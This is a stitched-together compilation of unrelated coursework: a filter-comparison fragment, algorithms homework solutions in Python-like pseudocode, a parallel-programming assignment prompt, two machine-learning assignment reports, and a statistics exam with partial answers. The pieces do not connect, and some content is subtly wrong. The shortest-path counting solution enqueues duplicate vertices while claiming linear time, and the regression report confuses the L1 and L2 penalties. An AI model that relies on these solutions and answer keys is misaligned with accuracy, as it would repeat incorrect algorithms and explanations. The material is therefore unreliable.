      ○ The IIR filter, being recursive, introduces minimal delay while still suppressing the high-frequency content, making it more suitable for real-time applications that require lower latency. Phase distortion can be a concern in IIR filters, but the use of zero-phase filtering (filtfilt) avoids this.
   3. Computational Efficiency:
      ○ The FIR filter requires more coefficients and thus more computational resources to achieve similar performance compared to the IIR filter.
      ○ The IIR filter is more computationally efficient, as it uses fewer coefficients to achieve a sharper cutoff and better attenuation of high frequencies.
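The exact filter parameters are not reproduced in this excerpt, so the following is a small illustrative sketch of the comparison described above, with assumed values (fs = 1000 Hz sampling, a 50 Hz cutoff, a 101-tap FIR filter applied with lfilter, and a 4th-order Butterworth IIR filter applied with zero-phase filtfilt), using scipy.signal:

    import numpy as np
    from scipy import signal

    # Assumed parameters -- the report's actual values are not shown in this excerpt.
    fs = 1000.0
    t = np.arange(0, 1.0, 1.0 / fs)
    x = np.sin(2 * np.pi * 10 * t) + 0.5 * np.sin(2 * np.pi * 100 * t)   # 10 Hz + 100 Hz

    # FIR low-pass: 101 taps, 50 Hz cutoff; lfilter introduces the group delay noted above.
    fir = signal.firwin(101, 50, fs=fs)
    y_fir = signal.lfilter(fir, [1.0], x)

    # IIR low-pass: 4th-order Butterworth, same cutoff, applied with zero-phase filtfilt.
    b, a = signal.butter(4, 50, btype="low", fs=fs)
    y_iir = signal.filtfilt(b, a, x)

    def mag_at(sig, f):
        # FFT magnitude at the bin closest to frequency f (used to compare attenuation)
        spec = np.abs(np.fft.rfft(sig))
        freqs = np.fft.rfftfreq(len(sig), 1.0 / fs)
        return spec[np.argmin(np.abs(freqs - f))]

    print("100 Hz magnitude  raw: %.1f  FIR: %.3f  IIR: %.3f"
          % (mag_at(x, 100), mag_at(y_fir, 100), mag_at(y_iir, 100)))

Printing the 100 Hz magnitude before and after each filter makes the qualitative comparison above (gradual FIR roll-off vs. steeper IIR attenuation) easy to check numerically.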
This assignment has in total 55 base points and 10 extra points, and the cap is 55. Bonus questions are indicated using the ⋆ mark. Please specify the following information before submission:
• Your Name: Yufeng Xu
• Your NetID: yx3038

Problem 1: Infinite knapsack [10⋆ + 15 pts]
(a)⋆ Prove that in any optimal solution (n1,…,nm), the total number of copies of the items I2,…,Im included in the knapsack is at most wmax − 1, i.e., n2 + n3 + ⋯ + nm ≤ wmax − 1.
(b) Based on the conclusion of (a), design an algorithm Knapsack(m,W,(w1,v1),…,(wm,vm)) for infinite knapsack with running time O(m · wmax²). For convenience, your algorithm only needs to return the maximum value achieved. Describe the basic idea and give the pseudocode. Briefly justify the correctness and analyze the time complexity. (Hint: According to (a), we know that, in an optimal solution, the total weight of the items I2,…,Im is at most wmax², and hence the item I1 occupies "most" space of the knapsack. Try to combine this observation with the O(mW)-time DP algorithm.)

Solution. Please write down your solution to Problem 1 here.
(a) We prove the claim by contradiction. Suppose there exists an optimal solution where n2 + ⋯ + nm ≥ wmax. Denote these copies of items as I′1,…,I′n with weights w′1,…,w′n, where n ≥ wmax, and for each j there exists i = 2,…,m such that w′j = wi. There can be multiple w′j's that are equal to the same wi. Now, we want to show that there exist 1 ≤ l ≤ r ≤ n such that w′l + ⋯ + w′r is a multiple of w1. Consider the sum of the first k w′j's, denoted Sk = w′1 + ⋯ + w′k, and let Sk ≡ Rk (mod w1), where Rk ∈ {0,1,…,w1 − 1}. (i) If there exists k such that Rk = 0, then take l = 1 and r = k; Sk is a multiple of w1. (ii) If no k has Rk = 0, then Rk can only take w1 − 1 possible values. Because n ≥ wmax ≥ w1 > w1 − 1, by the pigeonhole principle there exist k1 < k2 such that Rk1 = Rk2, hence Sk2 − Sk1 ≡ 0 (mod w1); take l = k1 + 1 and r = k2. In either case we obtain 1 ≤ l ≤ r ≤ n such that w′l + ⋯ + w′r = t · w1 for some positive integer t. Therefore, we can replace these copies with t copies of I1 (the item with the largest value per unit weight), and the final value is going to be larger, which contradicts our assumption that the original solution is optimal. Therefore, n2 + ⋯ + nm ≤ wmax − 1.

(b) We know from (a) that n2 + ⋯ + nm ≤ wmax − 1, hence the total weight of the items I2,…,Im is at most wmax(wmax − 1) < wmax². Consider the naive infinite knapsack algorithm. Let DP(i,w) represent the maximum value obtainable by choosing from items {i, i + 1, …, m} with total weight at most w. Because we can either take another copy of the i-th item or take none of them, DP(i,w) = max{DP(i + 1, w), vi + DP(i, w − wi)}. Because i = 1,2,…,m and w = 0,1,…,W, this algorithm has time complexity O(mW). Now, with the conclusion from (a), we can limit the search space of w for items i = 2,…,m to {0,1,…,wmax²}. Then the global maximum is equal to max over w of { DP(2,w) + ⌊(W − w)/w1⌋ · v1 }. For items 2,…,m, given any total weight limit w, the DP gives the optimal value of the items chosen. For the whole problem, we learned from (a) that the total weight of items 2,…,m is at most wmax². Therefore, we can limit the total weight used by items 2,…,m to wmax² and simply take as many copies of item 1 as possible with the remaining capacity. By using this method, we obtain the correct optimal value. Because the weight limit for items 2,…,m shrinks from W to wmax², and it takes O(1) time to add the copies of item 1 to a partial solution, the time complexity of the revised algorithm is O(m · wmax²). Below is the pseudocode:

from math import floor

def KNAPSACK(m, W, I):
    # I is a list of m items, each with a weight field .w and a value field .v
    # Sort so that I[0] is the item with the largest value-to-weight ratio (item I1).
    I = sorted(I, key=lambda x: x.v / x.w, reverse=True)
    w_max = max(item.w for item in I)
    # DP[idx][w]: best value using items I[idx..m-1] with total weight at most w.
    # Row m is all zeros and handles the boundary case.
    DP = [[0 for w in range(w_max ** 2 + 1)] for idx in range(m + 1)]
    for idx in range(m - 1, 0, -1):
        for w in range(w_max ** 2 + 1):
            if w >= I[idx].w:
                DP[idx][w] = max(I[idx].v + DP[idx][w - I[idx].w], DP[idx + 1][w])
            else:
                DP[idx][w] = DP[idx + 1][w]
    # Fill the remaining capacity greedily with copies of I[0] (= I1);
    # w is capped by W so the remaining capacity is never negative.
    ans = max(DP[1][w] + floor((W - w) / I[0].w) * I[0].v
              for w in range(min(w_max ** 2, W) + 1))
    return ans
Problem 2: Counting shortest paths [15 pts]
Given an undirected graph G = (V,E) and a vertex s ∈ V, we want to know for every vertex t ∈ V how many (distinct) shortest paths from s to t there are. This can be viewed as a generalization of the unique shortest-path problem. Design an algorithm Count(G,s) to solve this problem. The algorithm should return a list L that contains a pair (v, δv) for each vertex v of G, where δv is the number of shortest paths from s to v. Describe the basic idea and give the pseudocode. Briefly justify the correctness and analyze the time complexity. Your algorithm should run in O(n + m) time, where n = |V| and m = |E|.
A sample example. Suppose the input graph is G = (V,E) where V = {s,a,b,c,d,e} and E = {(a,b),(b,c),(c,d),(a,d),(s,a),(c,e)}; see the figure below. Then the algorithm Count(G,s) should return L = [(s,1),(a,1),(b,1),(c,2),(d,1),(e,2)].
(Hint: Exploit the BFS tree and extend the idea in the unique shortest-path problem.)

Solution. Please write down your solution to Problem 2 here.
We solve the problem by BFS. Consider a BFS tree of the graph: we view s as the root and perform a level-order traversal. For each node, we count the number of times it occurs on its level as the number of shortest paths to it. For the neighbors of the node being processed, if a neighbor has not been seen at an earlier (shallower) level, we append it to the queue that maintains the BFS traversal; otherwise we ignore it, because it was already counted at a shallower level, and its appearance in the current level does not correspond to a shortest path. The pseudocode is as follows:

class Node:
    def __init__(self):
        self.neighbors = []
    def add_neighbor(self, other):
        # undirected edge: record the adjacency in both directions
        self.neighbors.append(other)
        other.neighbors.append(self)

def COUNT(G, s):
    (V, E) = G                      # V: list of Node; E: list of (Node, Node) tuples
    for edge in E:
        edge[0].add_neighbor(edge[1])
    cnt = {}                        # cnt[v] = number of shortest paths to v found so far
    level = {s: 0}                  # BFS level at which each node is first reached
    depth = 0
    queue = [s]
    while queue != []:
        L = len(queue)
        for u in queue[:L]:         # process one whole level at a time
            cnt[u] = cnt.get(u, 0) + 1
            for v in u.neighbors:
                if v not in level:              # first time v is seen: it lies one level deeper
                    level[v] = depth + 1
                if level[v] == depth + 1:       # only enqueue occurrences coming from this level
                    queue.append(v)
        queue = queue[L:]
        depth += 1
    return [(item[0], item[1]) for item in cnt.items()]

This algorithm is correct because all the nodes with the same shortest-path length lie on the same level of the BFS tree, so by counting the number of times a node appears in the shallowest level where it appears, we count the number of shortest paths to that node. Because only shortest paths are considered, each edge is visited once and only once; the sum of the number of times each node is visited is O(m), therefore this algorithm is O(m) (and consequently O(m + n)).

Problem 3: Reaching the one [15 pts]
Let n ≥ 3 be a given positive integer and we are going to play a game as follows. During the game, we have a number k which is initially equal to 2. In each round of the game, we are allowed to change the current number k to a new number in one of the following ways:
• Type-A: Change k to (k + 1) mod n.
• Type-B: Change k to a divisor of k that is greater than 1.
• Type-C: Change k to k² mod n.
Note that the above three rules guarantee that our number k is always in the range {0,1,…,n−1} during the entire game. The game terminates when k becomes 1. Our goal is to finish the game in the fewest rounds.
For example, suppose n = 91 and we can play the game as follows.
• Round 1: 2 ⟹ 3 using a Type-A change.
• Round 2: 3 ⟹ 9 using a Type-C change.
• Round 3: 9 ⟹ 81 using a Type-C change.
• Round 4: 81 ⟹ 27 using a Type-B change.
• Round 5: 27 ⟹ 1 using a Type-C change.
As you can verify, this is an optimal solution. Design an algorithm Game(n) which returns an optimal solution to the game as a list. So Game(91) should return [2,3,9,81,27,1] (or another solution with 5 rounds). Describe the basic idea and give the pseudocode. Briefly justify the correctness and analyze the time complexity. Your algorithm should run in O(n log n) time. (Hint: Formulate the problem as a graph problem with n vertices and O(n log n) edges.)

Solution. Please write down your solution to Problem 3 here.
We construct a graph based on the problem setting: all the possible remainders modulo n, namely 0,1,…,n−1, become the n vertices. For the Type-A operation, we connect vertex k to vertex k+1 for k = 0,1,…,n−2, and connect n−1 to 0. For the Type-B operation, we connect vertex k to all its divisors larger than 1. For the Type-C operation, we connect vertex k to k² (mod n) for k = 2,…,n−1. Next, we consider the total number of directed edges. For Type-A, the number of directed edges is n; for Type-B, the total number of edges is at most Σ_{i=2}^{n−1} ⌊(n−1)/i⌋ ≤ Σ_{i=2}^{n−1} n/i (each i contributes one edge from every multiple of i); for Type-C, the total number of edges is n − 2. By the integral test, Σ_{i=2}^{n−1} 1/i ≤ ln(n) + 1, so the number of Type-B edges is O(n log n). Also, n is O(n log n), hence the total number of directed edges is O(n log n).
Next, we perform a BFS on this graph G. We use a queue to maintain the BFS procedure. We first append the starting vertex 2 to the queue. Each time, for the first vertex in the queue, if it is 1 we stop the BFS; otherwise we append all of its unvisited neighbors to the end of the queue and record the current vertex as the previous vertex of each such neighbor (if the neighbor does not already have a recorded previous vertex). This algorithm always finds a shortest path between 2 and 1, because the nearest vertices always reach the head of the queue first, so when 1 is visited, the path recovered through the previous-vertex links is guaranteed to be shortest. The time complexity of the BFS is O(n log n) because the total number of edges in the graph is O(n log n), and each edge is visited at most once. The time needed to construct the graph is also O(n log n) because each edge takes O(1) time to construct. Therefore, the overall complexity of the algorithm is O(n log n). The pseudocode is given as follows:

class Vertex:
    def __init__(self, val):
        self.val = val
        self.neighbors = []
    def add_neighbor(self, other):
        self.neighbors.append(other)

def GAME(n):
    V = [Vertex(i) for i in range(n)]
    # Type-A edges: k -> (k + 1) mod n
    for i in range(n - 1):
        V[i].add_neighbor(V[i + 1])
    V[n - 1].add_neighbor(V[0])          # wrap-around edge (n - 1) -> 0
    # Type-B edges: every multiple j of i gets an edge j -> i (divisor greater than 1)
    for i in range(2, n):
        for j in range(2 * i, n, i):
            V[j].add_neighbor(V[i])
    # Type-C edges: k -> k^2 mod n (skip self-loops)
    for i in range(2, n):
        if i ** 2 % n != i:
            V[i].add_neighbor(V[i ** 2 % n])
    # BFS from 2, recording each vertex's predecessor on a shortest path
    visited = [0 for i in range(n)]
    prev = [-1 for i in range(n)]
    queue = [2]
    while queue != []:
        head = queue[0]
        queue = queue[1:]
        visited[head] = 1
        if head == 1:
            break
        for nb in V[head].neighbors:
            if not visited[nb.val]:
                queue.append(nb.val)
                if prev[nb.val] == -1:
                    prev[nb.val] = head
    # Reconstruct the path by walking the predecessors back from 1
    sol = [1]
    while sol[-1] != -1:
        sol.append(prev[sol[-1]])
    return sol[-2::-1]
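As a quick sanity check, the cleaned-up pseudocode above can be run directly against the worked example; the exact path returned may differ from the one listed, but it will also take 5 rounds:

    print(GAME(91))   # one optimal play, e.g. [2, 3, 9, 81, 27, 1]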
Problem 4: Finding a strongly connected component [10 pts]
Given a directed graph G = (V,E) and a vertex s ∈ V, we want to compute the strongly connected component of G containing s. Design an algorithm SCC(G,s) which returns the set of vertices of G that lie in the same strongly connected component as s. Describe the basic idea and give the pseudocode. Briefly justify the correctness and analyze the time complexity. Your algorithm should run in O(n + m) time, where n = |V| and m = |E|. (Hint: By definition, a vertex v is in the same strongly connected component as s iff v is reachable from s and s is reachable from v. We already know how to find the vertices reachable from s using DFS. Can you use a similar idea to compute the vertices from which s is reachable?)

Solution. Please write down your solution to Problem 4 here.
For each node u, we store all the nodes v with (u,v) ∈ E as its out-neighbors and all the nodes w with (w,u) ∈ E as its in-neighbors. Then we perform a DFS over out-neighbors to obtain all the nodes that s can reach, and a DFS over in-neighbors to obtain all the nodes that can reach s. Lastly, we take the intersection of the two results, which is exactly the set of vertices in the strongly connected component containing s. This algorithm is correct: a DFS over out-neighbors reaches a vertex t iff t is reachable from s, and a DFS over in-neighbors (equivalently, a DFS after reversing the direction of every edge) reaches t iff there is a path of reversed edges from s to t, i.e., a path from t to s in the original graph, so s is reachable from t. By taking the intersection of the two results, a node t is kept iff it is reachable from s and it can reach s, i.e., it is strongly connected to s. The time complexity to process the in-neighbors and out-neighbors is O(m). The time complexity of each DFS is O(n + m). Therefore, the time complexity of the whole algorithm is O(n + m). The pseudocode is as follows:

class Node:
    def __init__(self, val):
        self.val = val
        self.neighbors = [[], []]          # neighbors[0]: in-neighbors, neighbors[1]: out-neighbors
    def add_neighbor(self, other):
        # add a directed edge from self to other
        self.neighbors[1].append(other)
        other.neighbors[0].append(self)

def SCC(G, s):
    (V, E) = G
    for (u, v) in E:
        u.add_neighbor(v)
    # res[0]: all nodes that can reach s (found by following in-neighbors)
    # res[1]: all nodes reachable from s (found by following out-neighbors)
    res = [set(), set()]
    def DFS(u, direction=0):
        # direction = 0 follows in-neighbors, direction = 1 follows out-neighbors
        res[direction].add(u)
        for v in u.neighbors[direction]:
            if v not in res[direction]:
                DFS(v, direction=direction)
    DFS(s, 0)
    DFS(s, 1)
    # s itself lies in its own strongly connected component, so it stays in the answer
    ans = res[0].intersection(res[1])
    return ans
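A minimal smoke test of the sketch above (the graph and labels are invented for illustration): a directed 3-cycle a -> b -> c -> a plus a dangling edge c -> d, for which the strongly connected component containing a is {a, b, c}.

    a, b, c, d = Node("a"), Node("b"), Node("c"), Node("d")
    G = ([a, b, c, d], [(a, b), (b, c), (c, a), (c, d)])
    print(sorted(node.val for node in SCC(G, a)))   # -> ['a', 'b', 'c']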
CSC718 Operating Sys & Parallel Programming Homework 4 MPI, OpenMP, and GPU Programming Assignments Total: 100 points The homework assignment will be graded based on the following criteria: • Accuracy: 1) the solution meets specific requirements in the problem description; 2) the solution produces correct results; 2) the procedures adopted in the solution are technically sound. • Efficiency: efficiency will be one of the criteria when grading programing assignment. The solution should produce the desired results efficiently. • Effort/neatness: the solution includes excellent effort, and all relate work is shown neatly and organized well. Homework assignment feedback will be available through the DropBox folder on D2L. For all the programming assignments, you can choose any operating systems you want. I will usually provide C/C++ samples for the programming assignments. If you prefer to use other languages, e.g., Java, they are accepted too. A README.txt is required to submit any programming assignments. In the README.txt, you need to provide the following information: 1) How to compile your program? 2) How to run your program? 3) What is the average running time of your program? 4) What are the expected output results when I run your program? Zip all you source code, project files, supporting files, and README.txt and submit the all-in-one zip file together to the D2L Dropbox. If you have any questions about the homework, please let me know. (10 points) What are the strengths and limitations of GPU programing? (15 points) Among the four parallel frameworks, multithreaded programming, MPI programming, openMP programming, and GPU programming (e.g., CUDA), we discussed in the class, what will be the strategies you are going to use in general when selecting a parallel framework for your applications? (10 points) Benchmarking of a sequential program reveals that 95 percent of the execution time is spent inside functions that are amendable to parallelization. What is the maximum speed up we could expect from executing a parallel version of this program on 10 processors using Amdahl’s Law? The “acceptable” identifier must meet the following constraints:CSC718 Operating Sys & Parallel Programming • The identifier is a six-digit combination of the numerals 0-9 1. (15 points) Write a sequential program to count the different identifiers given these constraints. 2. (20 points) Convert the sequential program to an MPI parallel program. 3. (20 points) (choose only one: A or B, not both) A. Convert the sequential program to an openMP parallel program. B. Convert the sequential program to a GPU program using a parallel framework at your choice (e.g., CUDA, OpenCL, etc.) 4. (10 points) Benchmark the three programs based on your choice in 3). Problem 1 process/ 1 thread 2 processes / 2 threads 3 processes / 3 threads 4 processes / or 4 threads Program1.c (sequential) n/a n/a n/a Program2.c (MPI) Program3.c (openMP or CUDA)
CS771A Assignment 3The Boys Rajarshi Dutta Udvas Basak Shivam Pandey 200762 201056 200938 1 Question 1 The first part of the solution essentially uses a linear model named Elastic Regression, which takes into account both the effects of Ridge Regression Penalty – L2 loss and Lasso Regression Penalty – L1 loss. The objective/loss function of the model is represented below: C(w) = argmin(1) w where, • w′ = Weights multiplied with each of the features present in the dataset taken into account for the construction of the regression model. • α = constant that multiplies both the lasso and ridge penalties. • λ1 = Regularization parameter for the Ridge regression penalty. • λ2 = Regularization parameter for the Lasso regression penalty. During the regularization procedure, the λ1 parameter leads to the formation of a sparse model, whereas the quadratic section of the penalty makes the part of λ1 portion more stable to the path of regularization, decreases the number of variables to be selected thereby promoting the grouping effect. The grouping effect enables the variables to be easily identified by correlation leading to the enhancement of the sampling procedure. This method first finds the Ridge Regression coefficients and then conducts the second step by using a Lasso sort of shrinkage of the coefficients. Inorder to determine the best performing linear model, Randomized Search Cross Validation technique has been applied for efficient hyperparameter selection out of the following sets of hyperparameters of the model. Here grid is a dictionary that contains the different hyperparameters of the Elastic Net Regression model as keys and its values. grid = dict() grid[’alpha’] = [1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 0.0, 0.2, 1.0] grid[’l1_ratio’] = np.arange(0,1, 0.01) grid[’selection’] = [’cyclic’, ’random’] grid[’max_iter’] = [2, 10, 100, 1000] grid[’tol’] = [1e-4, 1e-3, 1e-5, 1e-2, 1e-1, 0.0] The Randomized Search Cross Validation returns the best estimator with the following hyperparameters ElasticNet(alpha=0.1, l1_ratio=0.62, selection=’random’, tol=0.001, warm_start=True) Preprint. Under review. The corresponding MAE score on the training data are 5.6248 (for the O3 levels) and 6.5136 (for the NO2 levels) respectively. 2 Question 2 A suitable non-linear model which can effectively fit on the given dataset is K Nearest Neighbour algorithm. The KNN can be both used as a classification and regression model, which essentially classifies unknown data points based on the distance with respect to k nearest data points. The model essentially works on two different kinds of distance parameters, namely Euclidean distance, Minkowski distance and the Manhattan distance. One strength of the KNN regression algorithm that we would like to draw attention to at this point is its ability to work well with non-linear relationships. In the case of regression tasks, the algorithm chooses the k nearest points based on the given distance parameter. It calculates the new point to be approximately equal to the average of these nearest points. Also here Distance-weighted k-nearest-neighbor rule should be such where that it varies with the distance between the sample and the considered neighbor in such a manner that the value decreases with increasing sample-to-neighbor distance. (2) Here, the optimal value of K has been calculated by plotting the Train MAE loss and Test MAE loss for the case of both O3 and NO2 sensor values. 
The MAE loss variation for different k values has been shown below.Figure 1: MAE loss variation for K values We find that the KNN Regressor provides the minimum Mean absolute error for a k value of 5. model = KNeighborsRegressor(n_neighbors=5, P = 1, algorithm=”auto” , n_jobs = -1) Some other models tested for the given regression problem includes Xgboost, Multi-layer Perceptron, Random Forest Regressor models. • XGBoost Regressor : XGBoost uses a combination of two techniques, gradient boosting and tree boosting, to improve the accuracy of the model. Gradient boosting involves minimizing the loss function mean absolute error by iteratively adding weak learners (e.g., decision trees) to the model. Tree boosting, on the other hand, involves optimizing the split points of the decision tree by minimizing the loss function. • Random Forest Regressor : The algorithm works by creating a large number of decision trees, each of which is trained on a subset of the data and a subset of the features. The 2 final prediction is then made by averaging the predictions of all the trees in the forest. Random forest regression also includes several regularization techniques to prevent overfitting and improve the generalization of the model. These techniques include maximum depth, minimum samples per leaf, and maximum features. • Arttifical Neural Network : The given neural network consists of 64 followed by 32 and 8 layers. The optimizer used is Adam, and the kernel initialisation is He uniform and the loss function used is Mean absolute Error loss. The Perceptron is backpropagated for around 100 epochs on the training data with a batch size of 64. Non-linear Models O3 MAE loss NO2 MAE loss K Neighbours Regressor 3.3284 2.3228 XGboost Regressor 5.1433 4.7230 Random Forest Regressor 6.0784 5.3145 MultiLayer Perceptron 4.8807 4.9178 Table 1: Stats of different non-linear models 3 Question 3 The code is available in the submit.py file. Code snippet is mentioned below: import numpy as np import pickle as pkl # Define your prediction method here # df is a dataframe containing timestamps, weather data and potentials def my_predict( df ): X = np.array(df.iloc[:, 1:]) # Load your model file model = pkl.load(open(“knn_model.pkl”, “rb”)) test_preds = np.transpose(model.predict(X)) # Make two sets of predictions, one for O3 and pred_o3, pred_no2 = test_preds[0], test_preds[1] # Return both sets of predictions return ( pred_o3, pred_no2 ) another for NO2 3
CS771A Assignment 2The Boys Rajarshi Dutta 200762 Udvas Basak 201056 Shivam Pandey 200938 1 Solution 1 1.1 TheoryFigure 1: Illustration of a working ID3 algorithm We have used the Iterative Dichotomizer decision tree algorithm which is considered one of the most robustly used algorithms for supervised machine learning classification tasks. The algorithm works by recursively partitioning the training data based on their attributes until the decision tree produces the purest splits (referred to as the leaves). ID3 uses a top-down greedy approach to build a decision tree. The tree is basically constructed from the top and the greedy approach means that at each iteration the best feature is selected to split the node. 1.2 Our approach The decision tree constructed to solve the given Wordle-Solvr problem consists of the following components: 1.2.1 process node • For the process node function, every non-root node present in the ID3 tree constructed is considered and passed through the get entropy function which calculates the index of the vocabulary that minimizes entropy the most or maximizes the Information Gain. This index can be used to access the most appropriate query that can be used at that step. Preprint. Under review. • All words from list all words list are extracted and reveal function helps to uncover the mask between the query and the required word which is stored in split dict as the key. The value of the split dict contains an array of indices that returns the given mask when queried. get entropy • The get entropy function iterates over all of the words present in that node (possible candidate queries) and passes the array to the function calc entropy which returns the entropy of the current node. • Another dictionary is maintained which given the mask, corresponds to a number of queries(which when queried with the word provides that particular mask). These values are used to calculate the sum of weighted entropy after splitting the node. • The difference of the weighted sum of entropies after splitting the node with the initialentropy calculated from the parent node gives us the information gain used to produce the best split out of all words. (1) where, V = possible values in Attribute A, S = set of examples X, Sv = subset where XA = V • Information gain indirectly describes the mutual information between the attribute and theclass of labels S. calc entropy • This function simply calculates the Shannon Entropy based on the formula where p represents the probability of each class label which can be produced by the corresponding split based on their attribute. E(p) = −p · log2(p) (2) 2 Solution 2 The entire algorithm has been implemented in the submit.py file. 2
Write your name and section number at the top right of this page: Class Section Number Bret 8:50 001 Sahifa 1:20 003 Miranda 9:55 004 Sahifa 3:30 005 Sahifa 8:50 006 Cameron 1:20 007 As you complete the exam, write your initials at the top right of each other page.If you need more room, there is a blank page at the end of the exam, or we can give you some scratch paper. Some multiple choice questions are “Select ONE” while others are “Select ALL that apply”. Pay attention to the question type and only mark one option if it says “Select ONE”. Fill in the circles completely. 1. A dataframe lions has 32 rows, each representing a unique lion. It has two numeric columns: age , each lion’s age in decimal years, and proportion.black , the percentage of that lion’s nose which is black. Finally, it has a logical column adult , which is TRUE if age is greater than 3 and FALSE otherwise. Consider the following code which attempts to make a scatter plot of age on the X axis vs. proportion.black on the y axis.Which of the following statements are true about errors in the above code? Select ALL that apply. fill = adult must be changed to color = adult to color the points differently. alpha = 0.5 must be moved outside of aes() , like size = 2 currently is. size = 2 must be moved within aes() , like alpha = 0.5 is. fill = adult must be moved to the aes() in the ggplot() call, not geom point() . 2. Using the same dataframe as Question 1, consider the following code which creates a new dataframe, lions summary .Which of the following statements are true about lions summary ? Select ALL that apply. lions summary has 2 rows. lions summary has 2 columns. (False: adult, averageAge, and averagePropBlack.) lions summary has a column called ‘adult‘. If there were any NA values in the age column of lions , all the values of averageAge in lions summary will be NA (Sneakily false: If there are only NA values in one category of adult, the other can still function!) 3. A random viewer’s ideal movie length, in minutes, is approximately X ∼ N(120,15). Actual movie lengths are given by Y ∼ N(143,19). (a) Which R code below calculates the probability that a random movie is shorter than the 40th percentile for ideal movie length? Select ONE. qnorm(0.4, 120, 15) %>% pnorm(143, 19) qnorm(0.4, 143, 19) %>% pnorm(120, 15) pnorm(0.4, 120, 15) %>% qnorm(143, 19) pnorm(0.4, 143, 19) %>% qnorm(120, 15) (b) What movie length y corresponds to a z-score of 1? Select ONE. 19143 124162 (143 + 19 = 162) 4. Your friend claims that a random variable, X, follows the following probability distribution:Which of the following are true about your friend’s claim? Select ONE. This distribution has negative values of x, therefore X is not a random variable. This distribution has negative values of P(X = x), therefore X is not a random variable. The area under this distribution is not 1, therefore X is not a random variable. X is a valid random variable. 5. Consider ordering a ”footlong” (12 inch) sub from Subway. Consider trying to estimate µ, the average length of the sub you receive when you order a 12 inch sub. You do this by ordering 40 footlong subs and measuring their lengths in inches. (What a great problem this is.) You observe that the average length of your 40 subs is 11.5 inches, and the standard deviation of their lengths is 0.4 inches. Consider testing H0 : µ = 12 vs. Hα : µ < 12. Write a numeric expression (only containing numbers and artihmetic symbols like + and ×) for the test statistic of this test. x¯ − µnull √ sx/ n Answer:6. 
6. The fictitious distribution of the number of children in a household (X) is given below.

x           0      1      2      3
P(X = x)    ?      0.4    0.25   0.15

(a) Which of the following statements about X is true? Select ONE.
○ X is a discrete RV.
○ X is a binomial RV.
○ X is a continuous RV.
○ X is a normal RV.
(b) What value of P(X = 0) makes this a valid probability distribution? Select ONE.
○ 0.1
○ 0.15
○ 0.2
○ 0.25
(c) What is the median number of children per household? Select ONE.
○ 0
○ 1
○ 2
○ Not enough information to determine

7. Data is collected on the duration each winter that a lake's surface is frozen over a period of 103 consecutive years. The correlation coefficient between the variables is r = −0.4. The year variable has a mean x̄ = 1950 and a standard deviation sx = 30. The freeze duration variable has ȳ = 90 and a standard deviation sy = 17. Consider fitting a simple linear regression model to this data. Write a numerical expression (using only numbers and arithmetic symbols like + or ×) for the predicted freeze duration in the year 1890. No need to simplify.
Answer: 90 + (−0.4) × (−2) × 17
(1890 is two x standard deviations BELOW the mean of x, so our predicted value will be r times two y standard deviations away from the mean of y.) You could also take the long way: β̂1 = r × sy/sx, and β̂0 = 90 − β̂1 × 1950, so ŷ1 = β̂0 + β̂1 × 1890.

8. We continue to consider the lake freezing data from Problem 7. A 95% confidence interval for the freeze duration of the true regression line at x = 1890 has the form ŷ1 ± c × SEC. A 95% prediction interval for the duration that the lake was frozen in the single year 1890 has the form ŷ1 ± c × SEP, where c is a critical value from some distribution and SEC, SEP are some positive values. Reminder: there are 103 years in the dataset. Which R code calculates the numeric critical value c? Select ONE.
○ qnorm(0.95)
○ qnorm(0.975)
○ qt(0.95, 101)
○ qt(0.975, 101)
○ qt(0.95, 102)
○ qt(0.975, 102)

9. Using the expressions from the previous problem, circle the true relationship between SEC and SEP and briefly explain why.
SEC < SEP        SEC = SEP        SEC > SEP
Answer: A confidence interval for the height of the regression line is narrower than a prediction interval at the same x point, but they have the same center and critical value. Therefore, it must be that SEC < SEP.

10. Consider trying to estimate the proportion of UW-Madison undergraduate students who will graduate at the end of this semester, p. You ask 50 random students, and 7 of them will graduate at the end of the semester. Consider using this information to calculate a confidence interval for p. Which of the following statements are true? Select ALL that apply.
○ If we were to calculate an Agresti-Coull confidence interval for p, its center would be (7 + 1)/(50 + 2). (False: it would be (7 + 2)/(50 + 4).)
○ If we were to calculate a Wald confidence interval for p, its center would be 7/50.
○ The upper bound of the Agresti-Coull confidence interval would be greater than the upper bound of the Wald confidence interval. (It's shifted towards 0.5.)
○ As we increase the confidence level of our interval towards 100%, our interval would widen and approach [0, 1].

11. We are interested in comparing the proportions of individuals with bachelor degrees among adult men aged 25 and older in the states of Minnesota and Wisconsin. Let pM and pW represent these two population proportions. In random samples of nM = 300 Minnesota men and nW = 400 Wisconsin men aged 25 and older, the numbers of individuals with bachelor degrees are xM = 90 and xW = 100.
Without simplification, write a numerical expression using the provided data for the standard error SEci used in a 95% confidence interval for pM − pW of the form (point estimate) ± zcrit × SEci when using the Agresti-Coull method.
Answer: SEci =

12. In the setting of the problem above, write a numerical expression using the provided data for the standard error SEht of the test statistic Z:
Z = (p̂M − p̂W) / SEht ∼ N(0, 1)
Answer: SEht =

13. Suppose that the test statistic from the previous problem has the value z = 1.47 and that the p-value from a two-sided test is 0.14. Which of the following statements are true? Select ALL that apply.
○ The test is statistically significant at an α = 0.05 level.
○ A 95% confidence interval for pM − pW will contain the value 0. (Insignificant p-value.)

14. You ask a group of 30 people from Country A to each privately give you a random number between 1 and 1000. You then ask a group of 40 people from Country B to each privately give you a random number between 1 and 1000. Let µA be the true average value that all members of Country A would give upon this request, and similarly for µB. You are interested in the quantity µA − µB. Which of the following statements are true about how to approach this problem through statistical inference? Select ONE.
○ Two-sample means inference is impossible to conduct because the sample sizes are different.
○ Two-sample means inference is impossible to conduct because the random variables are technically discrete.
○ Two-sample inference is more appropriate than paired-sample inference in this case.
○ Paired-sample inference is more appropriate than two-sample inference in this case.

15. Assume the correct value of the test statistic from Problem 14 is −50. Which R code correctly calculates the p-value for this test? Select ONE.
○ pt(-50, df = W)
○ 2*pt(-50, df = W)
○ 2*pt(abs(-50), df = W)
○ 1 - pt(-50, df = W)
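For reference only (not part of the exam itself), a short Python check of two of the numeric answers given above — the test statistic in Problem 5 and the predicted freeze duration in Problem 7:

import math

# Problem 5: one-sample t statistic for H0: mu = 12 vs Ha: mu < 12
t_stat = (11.5 - 12) / (0.4 / math.sqrt(40))
print(round(t_stat, 2))                      # about -7.91

# Problem 7: predicted freeze duration in 1890 from the summary statistics
r, x_bar, s_x, y_bar, s_y = -0.4, 1950, 30, 90, 17
slope = r * s_y / s_x                        # beta1_hat = r * sy / sx
print(y_bar + slope * (1890 - x_bar))        # 103.6, same as 90 + (-0.4) * (-2) * 17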
Vikranth Udandarao 2022570

